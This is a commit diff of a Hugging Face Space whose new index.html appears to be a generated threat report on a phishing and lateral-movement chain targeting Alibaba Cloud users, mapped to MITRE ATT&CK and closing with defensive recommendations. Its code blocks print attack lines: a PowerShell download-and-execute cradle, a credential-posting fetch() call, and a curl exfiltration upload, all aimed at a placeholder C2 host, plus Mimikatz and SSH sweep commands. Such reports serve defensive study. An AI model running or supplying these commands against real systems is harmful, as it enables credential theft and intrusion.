Hugging Face's logo

Spaces:
capta1n
/
bas
Running

App Files Community
capta1n commited on
Commit
22306da
·
verified ·
1 Parent(s): 1998070

Add 2 files

Browse files
Files changed (2) hide show
  1. README.md +7 -5
  2. index.html +479 -19
README.md CHANGED
@@ -1,10 +1,12 @@
1
  ---
2
- title: Bas
3
- emoji: 🏆
4
- colorFrom: green
5
- colorTo: purple
6
  sdk: static
7
  pinned: false
 
 
8
  ---
9
 
10
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
1
  ---
2
+ title: bas
3
+ emoji: 🐳
4
+ colorFrom: yellow
5
+ colorTo: green
6
  sdk: static
7
  pinned: false
8
+ tags:
9
+ - deepsite
10
  ---
11
 
12
+ Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
index.html CHANGED
@@ -1,19 +1,479 @@
1
- <!doctype html>
2
- <html>
3
- <head>
4
- <meta charset="utf-8" />
5
- <meta name="viewport" content="width=device-width" />
6
- <title>My static Space</title>
7
- <link rel="stylesheet" href="style.css" />
8
- </head>
9
- <body>
10
- <div class="card">
11
- <h1>Welcome to your static Space!</h1>
12
- <p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
13
- <p>
14
- Also don't forget to check the
15
- <a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
16
- </p>
17
- </div>
18
- </body>
19
- </html>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Advanced Phishing & Lateral Movement Attack Report</title>
7
+ <script src="https://cdn.tailwindcss.com"></script>
8
+ <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
+ <style>
10
+ .timeline-item:not(:last-child)::after {
11
+ content: '';
12
+ position: absolute;
13
+ left: 24px;
14
+ top: 32px;
15
+ height: calc(100% - 32px);
16
+ width: 2px;
17
+ background-color: #e5e7eb;
18
+ }
19
+ .attack-step {
20
+ transition: all 0.3s ease;
21
+ }
22
+ .attack-step:hover {
23
+ transform: translateY(-2px);
24
+ box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
25
+ }
26
+ .code-block {
27
+ font-family: 'Courier New', monospace;
28
+ background-color: #f8f9fa;
29
+ border-left: 3px solid #3b82f6;
30
+ padding: 0.75rem;
31
+ overflow-x: auto;
32
+ }
33
+ .mitre-tag {
34
+ display: inline-flex;
35
+ align-items: center;
36
+ padding: 0.25rem 0.5rem;
37
+ border-radius: 9999px;
38
+ font-size: 0.75rem;
39
+ font-weight: 600;
40
+ }
41
+ </style>
42
+ </head>
43
+ <body class="bg-gray-50">
44
+ <div class="container mx-auto px-4 py-8 max-w-5xl">
45
+ <!-- Header -->
46
+ <div class="flex flex-col md:flex-row justify-between items-start md:items-center mb-8">
47
+ <div>
48
+ <h1 class="text-3xl font-bold text-gray-800">Advanced Phishing & Lateral Movement Attack Report</h1>
49
+ <p class="text-gray-600 mt-2">Detailed analysis of a sophisticated attack chain targeting internal credentials</p>
50
+ </div>
51
+ <div class="mt-4 md:mt-0 bg-white p-3 rounded-lg shadow-sm border border-gray-200">
52
+ <div class="flex items-center">
53
+ <div class="bg-red-100 p-2 rounded-full mr-3">
54
+ <i class="fas fa-shield-alt text-red-500"></i>
55
+ </div>
56
+ <div>
57
+ <p class="text-xs text-gray-500">Threat Level</p>
58
+ <p class="font-semibold text-red-600">Critical</p>
59
+ </div>
60
+ </div>
61
+ </div>
62
+ </div>
63
+
64
+ <!-- Executive Summary -->
65
+ <div class="bg-white p-6 rounded-lg shadow-sm border border-gray-200 mb-8">
66
+ <h2 class="text-2xl font-bold text-gray-800 mb-4">Executive Summary</h2>
67
+ <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mb-4">
68
+ <div class="bg-blue-50 p-4 rounded-lg">
69
+ <h3 class="font-semibold text-gray-800 mb-2">Attack Vector</h3>
70
+ <p class="text-sm text-gray-600">Spear phishing with malicious documents/links</p>
71
+ </div>
72
+ <div class="bg-purple-50 p-4 rounded-lg">
73
+ <h3 class="font-semibold text-gray-800 mb-2">Primary Target</h3>
74
+ <p class="text-sm text-gray-600">Internal SSH credentials & sensitive documents</p>
75
+ </div>
76
+ <div class="bg-red-50 p-4 rounded-lg">
77
+ <h3 class="font-semibold text-gray-800 mb-2">Impact</h3>
78
+ <p class="text-sm text-gray-600">Full internal network compromise possible</p>
79
+ </div>
80
+ </div>
81
+ <p class="text-gray-700">
82
+ This report details a sophisticated attack chain beginning with carefully crafted phishing emails, leading to C2 implantation, credential theft, and lateral movement through internal networks. The attacker demonstrates advanced techniques including domain spoofing, malicious macros, C2 infrastructure obfuscation, and browser session hijacking.
83
+ </p>
84
+ </div>
85
+
86
+ <!-- Timeline -->
87
+ <div class="relative">
88
+ <!-- Phase 1: Initial Compromise -->
89
+ <div class="relative timeline-item pl-16 pb-8">
90
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
91
+ 1
92
+ </div>
93
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
94
+ <div class="flex justify-between items-start">
95
+ <div>
96
+ <h3 class="font-bold text-lg text-gray-800">Initial Compromise</h3>
97
+ <p class="text-gray-600 mt-1">Spear Phishing Campaign</p>
98
+ </div>
99
+ <span class="mitre-tag bg-blue-100 text-blue-800">
100
+ <i class="fas fa-envelope mr-1"></i> T1566.001
101
+ </span>
102
+ </div>
103
+ <div class="mt-4">
104
+ <div class="flex items-start">
105
+ <div class="bg-gray-100 p-2 rounded-full mr-3 mt-1">
106
+ <i class="fas fa-user-secret text-gray-600"></i>
107
+ </div>
108
+ <div>
109
+ <h4 class="font-medium text-gray-700">Attack Details</h4>
110
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
111
+ <li>Email subjects: "紧急通知:阿里云账号异常登录提醒" or "内部会议纪要(机密)"</li>
112
+ <li>Body mimics official Alibaba Cloud communications</li>
113
+ <li>Contains either malicious attachment or phishing link</li>
114
+ </ul>
115
+
116
+ <h4 class="font-medium text-gray-700 mt-3">Technical Indicators</h4>
117
+ <div class="code-block mt-2">
118
+ <p>Attachment: 阿里云安全报告_v2023.pdf (malicious macro)</p>
119
+ <p>Phishing URL: https://aliyun-support[.]com/verify</p>
120
+ <p>Spoofed sender: security@alibaba-inc.com</p>
121
+ <p>Typosquatting domain: al1baba-inc[.]com</p>
122
+ </div>
123
+ </div>
124
+ </div>
125
+ </div>
126
+ </div>
127
+ </div>
128
+
129
+ <!-- Phase 2: Execution -->
130
+ <div class="relative timeline-item pl-16 pb-8">
131
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
132
+ 2
133
+ </div>
134
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
135
+ <div class="flex justify-between items-start">
136
+ <div>
137
+ <h3 class="font-bold text-lg text-gray-800">Execution</h3>
138
+ <p class="text-gray-600 mt-1">Malicious Payload Delivery</p>
139
+ </div>
140
+ <span class="mitre-tag bg-purple-100 text-purple-800">
141
+ <i class="fas fa-code mr-1"></i> T1059.001
142
+ </span>
143
+ </div>
144
+ <div class="mt-4">
145
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
146
+ <div>
147
+ <h4 class="font-medium text-gray-700">Malicious Document</h4>
148
+ <div class="code-block mt-2">
149
+ <p>Macro code:</p>
150
+ <p>powershell IEX (New-Object Net.WebClient).DownloadString('http://C2-SERVER/payload.ps1')</p>
151
+ </div>
152
+ <p class="text-sm text-gray-600 mt-2">Downloads and executes Cobalt Strike payload</p>
153
+ </div>
154
+ <div>
155
+ <h4 class="font-medium text-gray-700">Phishing Site</h4>
156
+ <div class="code-block mt-2">
157
+ <p>JavaScript credential theft:</p>
158
+ <p>fetch('http://C2-SERVER/steal', {</p>
159
+ <p> method: 'POST',</p>
160
+ <p> body: JSON.stringify({user: username, pass: password})</p>
161
+ <p>});</p>
162
+ </div>
163
+ <p class="text-sm text-gray-600 mt-2">Perfect replica of Alibaba Cloud login</p>
164
+ </div>
165
+ </div>
166
+ </div>
167
+ </div>
168
+ </div>
169
+
170
+ <!-- Phase 3: Persistence -->
171
+ <div class="relative timeline-item pl-16 pb-8">
172
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
173
+ 3
174
+ </div>
175
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
176
+ <div class="flex justify-between items-start">
177
+ <div>
178
+ <h3 class="font-bold text-lg text-gray-800">Persistence</h3>
179
+ <p class="text-gray-600 mt-1">C2 Infrastructure Establishment</p>
180
+ </div>
181
+ <span class="mitre-tag bg-red-100 text-red-800">
182
+ <i class="fas fa-server mr-1"></i> T1572
183
+ </span>
184
+ </div>
185
+ <div class="mt-4">
186
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
187
+ <div>
188
+ <h4 class="font-medium text-gray-700">C2 Configuration</h4>
189
+ <div class="code-block mt-2">
190
+ <p>Cobalt Strike listener:</p>
191
+ <p>windows/x64/reflective PE</p>
192
+ <p>HTTPS with valid certificate</p>
193
+ <p>Multiple IP rotation via CDN</p>
194
+ </div>
195
+ </div>
196
+ <div>
197
+ <h4 class="font-medium text-gray-700">Persistence Methods</h4>
198
+ <div class="code-block mt-2">
199
+ <p>Registry:</p>
200
+ <p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</p>
201
+ <p>Task Scheduler:</p>
202
+ <p>schtasks /create /tn "Windows Update" /tr "C:\Windows\System32\malicious.exe"</p>
203
+ </div>
204
+ </div>
205
+ </div>
206
+ </div>
207
+ </div>
208
+ </div>
209
+
210
+ <!-- Phase 4: Credential Access -->
211
+ <div class="relative timeline-item pl-16 pb-8">
212
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
213
+ 4
214
+ </div>
215
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
216
+ <div class="flex justify-between items-start">
217
+ <div>
218
+ <h3 class="font-bold text-lg text-gray-800">Credential Access</h3>
219
+ <p class="text-gray-600 mt-1">SSH & Browser Credential Theft</p>
220
+ </div>
221
+ <span class="mitre-tag bg-yellow-100 text-yellow-800">
222
+ <i class="fas fa-key mr-1"></i> T1555
223
+ </span>
224
+ </div>
225
+ <div class="mt-4">
226
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
227
+ <div>
228
+ <h4 class="font-medium text-gray-700">Credential Harvesting</h4>
229
+ <div class="code-block mt-2">
230
+ <p>Browser cookies:</p>
231
+ <p>Mimikatz !sekurlsa::logonpasswords</p>
232
+ <p>SSH keys:</p>
233
+ <p>search C:\Users\*\.ssh\id_rsa</p>
234
+ </div>
235
+ </div>
236
+ <div>
237
+ <h4 class="font-medium text-gray-700">Credential Storage</h4>
238
+ <div class="code-block mt-2">
239
+ <p>Windows Credential Manager:</p>
240
+ <p>cmdkey /list</p>
241
+ <p>SSH config files:</p>
242
+ <p>C:\Users\*\.ssh\config</p>
243
+ </div>
244
+ </div>
245
+ </div>
246
+ </div>
247
+ </div>
248
+ </div>
249
+
250
+ <!-- Phase 5: Lateral Movement -->
251
+ <div class="relative timeline-item pl-16 pb-8">
252
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
253
+ 5
254
+ </div>
255
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
256
+ <div class="flex justify-between items-start">
257
+ <div>
258
+ <h3 class="font-bold text-lg text-gray-800">Lateral Movement</h3>
259
+ <p class="text-gray-600 mt-1">Internal Network Penetration</p>
260
+ </div>
261
+ <span class="mitre-tag bg-orange-100 text-orange-800">
262
+ <i class="fas fa-arrows-alt-h mr-1"></i> T1021
263
+ </span>
264
+ </div>
265
+ <div class="mt-4">
266
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
267
+ <div>
268
+ <h4 class="font-medium text-gray-700">SSH Access</h4>
269
+ <div class="code-block mt-2">
270
+ <p>ssh -i id_rsa user@10.0.0.5</p>
271
+ <p>plink.exe -ssh -P 22 -i id_rsa user@10.0.0.6</p>
272
+ </div>
273
+ <p class="text-sm text-gray-600 mt-2">Using stolen credentials for access</p>
274
+ </div>
275
+ <div>
276
+ <h4 class="font-medium text-gray-700">Internal Recon</h4>
277
+ <div class="code-block mt-2">
278
+ <p>nmap -sS 10.0.0.0/24</p>
279
+ <p>for ip in {1..254}; do ssh -o ConnectTimeout=1 user@10.0.0.$ip; done</p>
280
+ </div>
281
+ <p class="text-sm text-gray-600 mt-2">Scanning for additional targets</p>
282
+ </div>
283
+ </div>
284
+ </div>
285
+ </div>
286
+ </div>
287
+
288
+ <!-- Phase 6: Exfiltration -->
289
+ <div class="relative timeline-item pl-16">
290
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
291
+ 6
292
+ </div>
293
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
294
+ <div class="flex justify-between items-start">
295
+ <div>
296
+ <h3 class="font-bold text-lg text-gray-800">Exfiltration</h3>
297
+ <p class="text-gray-600 mt-1">Data Collection & Exfiltration</p>
298
+ </div>
299
+ <span class="mitre-tag bg-green-100 text-green-800">
300
+ <i class="fas fa-cloud-download-alt mr-1"></i> T1041
301
+ </span>
302
+ </div>
303
+ <div class="mt-4">
304
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
305
+ <div>
306
+ <h4 class="font-medium text-gray-700">Browser Proxy</h4>
307
+ <div class="code-block mt-2">
308
+ <p>proxychains4 -q -f /path/to/config.txt firefox</p>
309
+ <p>Proxy config: 1.2.3.4:8080</p>
310
+ </div>
311
+ <p class="text-sm text-gray-600 mt-2">MITM for internal application access</p>
312
+ </div>
313
+ <div>
314
+ <h4 class="font-medium text-gray-700">Data Theft</h4>
315
+ <div class="code-block mt-2">
316
+ <p>Target files:</p>
317
+ <p>*.pem, *.key, *.sql, *.db</p>
318
+ <p>Exfiltration:</p>
319
+ <p>split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload</p>
320
+ </div>
321
+ </div>
322
+ </div>
323
+ </div>
324
+ </div>
325
+ </div>
326
+ </div>
327
+
328
+ <!-- MITRE ATT&CK Mapping -->
329
+ <div class="mt-12 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
330
+ <h2 class="text-2xl font-bold text-gray-800 mb-4">MITRE ATT&CK Mapping</h2>
331
+
332
+ <div class="overflow-x-auto">
333
+ <table class="min-w-full divide-y divide-gray-200">
334
+ <thead class="bg-gray-50">
335
+ <tr>
336
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Tactic</th>
337
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Technique</th>
338
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">ID</th>
339
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Description</th>
340
+ </tr>
341
+ </thead>
342
+ <tbody class="bg-white divide-y divide-gray-200">
343
+ <tr>
344
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Initial Access</td>
345
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Spearphishing Attachment</td>
346
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1566.001</td>
347
+ <td class="px-6 py-4 text-sm text-gray-500">Malicious documents sent via email</td>
348
+ </tr>
349
+ <tr>
350
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Execution</td>
351
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">PowerShell</td>
352
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1059.001</td>
353
+ <td class="px-6 py-4 text-sm text-gray-500">Macro executes PowerShell payload</td>
354
+ </tr>
355
+ <tr>
356
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Persistence</td>
357
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Registry Run Keys</td>
358
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1547.001</td>
359
+ <td class="px-6 py-4 text-sm text-gray-500">Adds malicious executable to startup</td>
360
+ </tr>
361
+ <tr>
362
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Credential Access</td>
363
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Credentials from Password Stores</td>
364
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1555</td>
365
+ <td class="px-6 py-4 text-sm text-gray-500">Harvests SSH keys and browser cookies</td>
366
+ </tr>
367
+ <tr>
368
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Lateral Movement</td>
369
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Remote Services: SSH</td>
370
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1021.004</td>
371
+ <td class="px-6 py-4 text-sm text-gray-500">Uses stolen SSH keys for access</td>
372
+ </tr>
373
+ <tr>
374
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Exfiltration</td>
375
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Exfiltration Over C2 Channel</td>
376
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1041</td>
377
+ <td class="px-6 py-4 text-sm text-gray-500">Data sent through established C2</td>
378
+ </tr>
379
+ </tbody>
380
+ </table>
381
+ </div>
382
+ </div>
383
+
384
+ <!-- Recommendations -->
385
+ <div class="mt-8 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
386
+ <h2 class="text-2xl font-bold text-gray-800 mb-4">Defensive Recommendations</h2>
387
+
388
+ <div class="space-y-4">
389
+ <div class="flex items-start">
390
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
391
+ 1
392
+ </div>
393
+ <div>
394
+ <h3 class="font-medium text-gray-800">Enhanced Email Security</h3>
395
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
396
+ <li>Implement DMARC/DKIM/SPF to prevent sender spoofing</li>
397
+ <li>Deploy advanced attachment sandboxing for macro analysis</li>
398
+ <li>User training on identifying typosquatting domains</li>
399
+ </ul>
400
+ </div>
401
+ </div>
402
+
403
+ <div class="flex items-start">
404
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
405
+ 2
406
+ </div>
407
+ <div>
408
+ <h3 class="font-medium text-gray-800">Endpoint Protection</h3>
409
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
410
+ <li>Block Office macros from the internet zone</li>
411
+ <li>Monitor for suspicious PowerShell execution patterns</li>
412
+ <li>Implement application whitelisting for executables</li>
413
+ </ul>
414
+ </div>
415
+ </div>
416
+
417
+ <div class="flex items-start">
418
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
419
+ 3
420
+ </div>
421
+ <div>
422
+ <h3 class="font-medium text-gray-800">Credential Protection</h3>
423
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
424
+ <li>Enforce MFA for all SSH access</li>
425
+ <li>Regular rotation of SSH keys with automated monitoring</li>
426
+ <li>Credential guard for browser session protection</li>
427
+ </ul>
428
+ </div>
429
+ </div>
430
+
431
+ <div class="flex items-start">
432
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
433
+ 4
434
+ </div>
435
+ <div>
436
+ <h3 class="font-medium text-gray-800">Network Monitoring</h3>
437
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
438
+ <li>Detect unusual SSH login patterns (time/location)</li>
439
+ <li>Monitor for internal systems communicating with external IPs</li>
440
+ <li>Implement network segmentation for critical assets</li>
441
+ </ul>
442
+ </div>
443
+ </div>
444
+ </div>
445
+ </div>
446
+ </div>
447
+
448
+ <footer class="bg-gray-100 border-t border-gray-200 py-6 mt-12">
449
+ <div class="container mx-auto px-4 text-center text-gray-500 text-sm">
450
+ <p>Advanced Phishing & Lateral Movement Attack Report | Generated on <span id="current-date"></span></p>
451
+ <p class="mt-1">Confidential - For authorized personnel only</p>
452
+ </div>
453
+ </footer>
454
+
455
+ <script>
456
+ // Set current date
457
+ const now = new Date();
458
+ const options = { year: 'numeric', month: 'long', day: 'numeric', hour: '2-digit', minute: '2-digit' };
459
+ document.getElementById('current-date').textContent = now.toLocaleDateString('en-US', options);
460
+
461
+ // Add animation to attack steps
462
+ const observer = new IntersectionObserver((entries) => {
463
+ entries.forEach(entry => {
464
+ if (entry.isIntersecting) {
465
+ entry.target.style.opacity = '1';
466
+ entry.target.style.transform = 'translateY(0)';
467
+ }
468
+ });
469
+ }, { threshold: 0.1 });
470
+
471
+ document.querySelectorAll('.attack-step').forEach(step => {
472
+ step.style.opacity = '0';
473
+ step.style.transform = 'translateY(20px)';
474
+ step.style.transition = 'all 0.4s ease-out';
475
+ observer.observe(step);
476
+ });
477
+ </script>
478
+ <p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - 🧬 <a href="https://enzostvs-deepsite.hf.space?remix=capta1n/bas" style="color: #fff;text-decoration: underline;" target="_blank" >Remix</a></p></body>
479
+ </html>